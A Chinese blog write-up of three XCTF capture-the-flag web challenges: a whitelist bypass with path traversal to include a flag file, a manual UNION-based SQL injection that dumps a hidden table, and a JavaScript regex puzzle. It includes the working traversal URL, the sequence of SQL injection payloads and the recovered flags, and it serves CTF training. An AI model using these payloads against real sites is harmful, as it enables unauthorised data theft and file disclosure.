攻防世界WEB高手进阶区warmup,NewsCenter,NaNNaNNaNNaN-Batman
前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
攻防世界专栏:https://blog.csdn.net/m0_63127854/category_11983747.html
网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan
目录
warmup
题目介绍
解题思路
访问靶场
查看source.php
查看hint.php
绕过
构造payload
找到flag
NewsCenter
题目介绍
解题思路
访问靶场
sql手工注入
找到flag
NaNNaNNaNNaN-Batman
题目介绍
解题思路
查看文件
加上后缀名,以html形式打开
将eval函数改为alert
查看代码
返回eval页面
找到flag
warmup
题目介绍
解题思路
访问靶场
F12查看源代码
查看source.php
<?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;}}if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";}
?>
查看hint.php
发现flag在ffffllllaaaagggg下
绕过
步骤一:
只要我们传的参数是source.php或者hint.php则返回真
如果不满足继续往下判断
步骤二:
取传进参数首次出现?前的部分
再进行白名单判断
如果还不满足继续往下判断
步骤三:
先把传进的参数做urldecode
接着就和第二步一样
都不满足就输出"you can't see it"并且返回假
要想满足这些条件那我们传的参数就只能是这种形式
构造payload
http://111.200.241.244:57432/source.php?file=hint.php?/../../../../../../ffffllllaaaagggg
找到flag
flag{25e7bce6005c4e0c983fb97297ac6e5a}
NewsCenter
题目介绍
解题思路
访问靶场
sql手工注入
判断是否具有注入点
1' and 1=1-- -
查看列数
1' order by 3-- -
从1开始试,到4页面回显不正常,所以才用到3
联合查询
1' union select 1,2,3-- -
查找库名
查找表名
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='news'-- -
查找字段
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='news'-- -
news表下没有找到flag,查看secret_table表
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='secret_table'-- -
查看字段值(flag)
1' union select 1,2,(select group_concat(id,0x3a,fl4g) from secret_table)-- -
找到flag
QCTF{sq1_inJec7ion_ezzz}
NaNNaNNaNNaN-Batman
题目介绍
解题思路
查看文件
加上后缀名,以html形式打开
将eval函数改为alert
查看页面
查看代码
function $(){var e=document.getElementById("c").value;if(e.length==16)if(e.match(/^be0f23/)!=null)if(e.match(/233ac/)!=null)if(e.match(/e98aa$/)!=null)if(e.match(/c7be9/)!=null){var t=["fl","s_a","i","e}"];var n=["a","_h0l","n"];var r=["g{","e","_0"];var i=["it'","_","n"];var s=[t,n,r,i];for(var o=0;o<13;++o){document.write(s[o%4][0]);s[o%4].splice(0,1)}}}document.write('<input id="c"><button onclick=$()>Ok</button>');delete
返回eval页面
满足正则
满足length==16,正则的话^为开始符号,$为结尾符号,拼接一下:be0f233ac7be98aa,输入就拿到flag了。
找到flag
flag{it's_a_h0le_in_0ne}
攻防世界WEB高手进阶区warmup,NewsCenter,NaNNaNNaNNaN-Batman相关推荐
- 攻防世界-web高手进阶区
文章目录 攻防世界-web高手进阶区 1.baby_web 2.Training-WWW-Robots 3.Web_php_include (文件包含+伪协议) 1.方法 2.方法 4.ics-06( ...
- 攻防世界 web高手进阶区 9分题 favorite_number
前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是favorite_number的writeup 解题过程 进入界面 简单的代码审计 首先是个判断,既要数组强等于,又要首元素不等 然 ...
- 攻防世界 web高手进阶区 10分题 weiphp
前言 继续ctf的旅程 开始攻防世界web高手进阶区的10分题 本文是weiphp的writeup 解题过程 进入界面 点击 进入一个登陆界面 没有注册 那肯定得找源码了 惯例源码+御剑 发现git泄 ...
- 攻防世界 web高手进阶区 8分题 Web_python_block_chain
前言 继续ctf的旅程 开始攻防世界web高手进阶区的8分题 本文是Web_python_block_chain的writeup 解题过程 这是个区块链题 这..裂开了啊 没搞过区块链 从零开始学习 ...
- 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)WriteUp
文章目录 解题部分 总结: 解题部分 题目来源 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备-没有显示 ...
- 攻防世界 web高手进阶区 9分题 bilibili
前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是bilibili的writeup 解题过程 进来界面 这尼玛出题人是黑还是粉啊 笑死 看题目意思是买lv6 惯例源码+御剑 没发现什 ...
- 攻防世界 web高手进阶区 7分题Confusion1
前言 继续ctf的旅程 开始攻防世界web高手进阶区的7分题 本文是Confusion1的writeup 解题过程 进来的界面如下 (后来知道是php vs python的意思,也就是给提示跟pyth ...
- XCTF 攻防世界 web 高手进阶区
文章目录 ics-07 shrine( flask + jinja2 的 SSTI) easytornado(模板注入) upload(文件名注入) supersqli(堆叠注入) php_rce(T ...
- 攻防世界——web高手进阶区题解
目录 1,cat (Django,cURL漏洞) 2,ics-05(XCTF 4th-CyberEarth)(文件包含 + preg_replace函数漏洞) 3,ics-06(爆破id) 4,l ...
最新文章
- 使用matlab进行mex编译时的路径问题mexopts
- ssh跳板登陆太麻烦,使用expect每次自动登录 利用expect 模拟键盘动作,在闲置时间之内模拟地给个键盘响应...
- 【错误记录】GitHub 网站和仓库无法访问 ( 域名重定向 | 检查 C:\Windows\System32\drivers\etc\hosts 配置文件中的 GitHub 地址域名配置 )
- 当视频恋爱 App 用上了 Serverless
- 牛客网 在线编程 局部最小值位置
- java 类.class_面试官:Java反射是什么?我回答不上来!
- transformer论文解读_【论文解读】ICLR2020 | 深度自适应Transformer
- Linux(debian7)操作基础(五)之per调用shell命令
- 关于数据库中的char与varchar
- 微软服务器补丁每月几号发布,微软补丁日安全通告 |9 月份
- 创业不难,找准项目才难,教你一眼识破好项目
- 绩效考核管理中的模型分析与功能设计
- oracle羊毛,弃Cloudflare,薅Oracle羊毛
- mybatis 大于等于小于等于
- 深度学习之美(张玉宏)——第三章 机器学习三重门
- 数据库完整性--断言和触发器
- C++:实现量化SMM Caplet α 校准测试实例
- 金融风控数据挖掘--Task1
- facebook修改权限_如何在Facebook上更改小组的隐私
- three.js流动线